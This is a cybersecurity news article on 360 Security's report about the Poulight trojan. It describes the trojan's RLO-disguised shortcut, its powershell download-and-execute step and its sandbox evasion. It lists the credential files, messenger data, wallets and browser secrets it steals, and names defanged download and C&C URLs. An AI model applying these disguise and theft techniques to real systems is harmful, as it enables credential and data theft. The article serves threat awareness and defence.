360 Security Reports “TXT File” That Can Steal All Tour Secrets

360 Security Reports “TXT File” That Can Steal All Tour Secrets

360 Security Center’s threat team detected an email phishing attack that delivers Poulight Trojan that exfiltrates a vide array of data. 

360 Security Center’s threat monitoring platform has been tracking Poulight Trojan since last year and presented its findings in a report last Friday.

The 360 researchers say the trojan has “complete and powerful functions” and that the current campaign showed that it has begun to spread overseas.

The attack starts with a phishing file using RLO (Right-to-Left Override) method. Using RLO, the phishing file shows up on the user’s computer as “ReadMe_knl.txt” but originally was named “ReadMe_txt.lnk.lnk.” 

In addition, the attacker could set the icon of the lnk file as a notepad icon to further confuse the user who is likely to mistake it for a benign txt file.

Image: 360 Security

When the user opens this fake txt file, they actually executed the code of the attacker and the powershell command will run to download and execute the malicious program from https[:]//iwillcreatemedia[.]com/build.exe. 

The malware developer did not obfuscate the code inside the malicious program which had a straightforward name of Poullight.exe. 

The use will also download putty3.exe file which will first check whether the current environment is a virtual machine or a virus analysis environment. If it is a virus analysis environment, it will stop running. In this way, the hackers can evade analysis by some virus sandboxes.

After running the checks, the trojan starts to execute its malicious payloads.

Poullight then gets and stores locally in files the following data: user names, machine names, system names, anti-virus products, graphics card labels, and processor labels, and other machine information. And after that, if gets the list of currently active processes and writes it into the file %LocalAppData%\\1z9sq09u\\ProcessList.txt. 

After a few more  manipulations, Poulight proceeds to stealing the following data:

  • Desktop screenshot;
  • Document names, if the file name contains such words as password, login, account, аккаунт, пароль, вход, важно, сайта, site, or the suffix is .txt, .rtf, .log, .doc,. docx, .rdp, .sql files;
  • Pictures from a web camera;
  • FileZilla server login credentials:FileZilla\recentservers.xml;
  • Pidgin login configuration: .purple\accounts.xml;
  • Discord data storage backup: discord\Local Storage;
  • Telegram data storage files;
  • Skype data: Microsoft\\Skype for Desktop\\Local Storage;
  • Various cryptocurrency wallet related documents;
  • Access URLs, steal cookies, accounts, passwords, autofill data, payment card information, etc. from 25 browsers;
  • And more.

The trojan uploads the stolen data to one of two remote C&C servers, http[:]//poullight[.]ru/handle.php (unused) and http[:]//gfl.com[.]pk/Panel/gate.php.

360 Total Security researchers reported  the following IOCs for Poullight:











About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.